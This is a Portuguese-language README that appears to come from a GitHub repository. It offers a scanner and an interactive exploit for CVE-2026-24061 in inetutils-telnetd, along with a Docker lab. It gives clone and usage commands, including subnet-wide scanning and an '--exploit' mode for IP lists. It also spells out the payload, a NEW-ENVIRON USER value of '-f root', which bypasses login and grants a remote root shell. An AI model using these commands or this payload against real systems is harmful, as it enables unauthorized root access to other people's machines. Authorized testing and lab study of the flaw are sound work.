
Scanner e exploit interativo para CVE-2026-24061 no inetutils-telnetd, permitindo acesso root pré-autenticação via negociação NEW-ENVIRON personalizada. Inclui varredura multithread e laboratório Docker.
👨💻 Autor: Furkan KAYAPINAR (@FurkanKAYAPINAR)
Este repositório contém um scanner de vulnerabilidades e um exploit interativo para CVE-2026-24061. Esta vulnerabilidade afeta o inetutils-telnetd (e potencialmente outras implementações de Telnet) através do tratamento inadequado da opção Telnet NEW-ENVIRON, permitindo acesso remoto pré-autenticação usando o payload -f root.
--exploitinetutils-telnetd para testes seguros.Certifique-se de ter o Python 3.x instalado.
git clone https://github.com/FurkanKAYAPINAR/CVE-2026-24061-telnet2root.git
cd CVE-2026-24061-telnet2root
## Uso
Escaneie alvos em busca da vulnerabilidade NEW-ENVIRON.
# Escanear um único alvo
python3 scanner.py -t 192.168.1.100 -p 1903
# Escanear uma sub-rede
python3 scanner.py -s 192.168.1.0/24 -p 1903
# Escanear uma lista de IPs e tentar exploração ativa (verificação de RCE)
python3 scanner.py -l ips.txt -p 1903 --exploit
Obtenha acesso interativo a um shell root.
python3 exploit.py -t 127.0.0.1 -p 1903
Implante um ambiente vulnerável local para testes:
cd lab
docker-compose up -d --build
A vulnerabilidade é acionada durante a fase de negociação do Telnet. Ao responder à solicitação DO NEW-ENVIRON do servidor com um pacote de sub-negociação especialmente elaborado IS VAR "USER" VALUE "-f root", o processo telnetd do lado do servidor é enganado para passar o flag -f root ao processo login, contornando a autenticação.
[!WARNING]
Esta ferramenta é destinada apenas para fins educacionais e de testes de segurança autorizados. O acesso não autorizado a sistemas de computador é ilegal e antiético.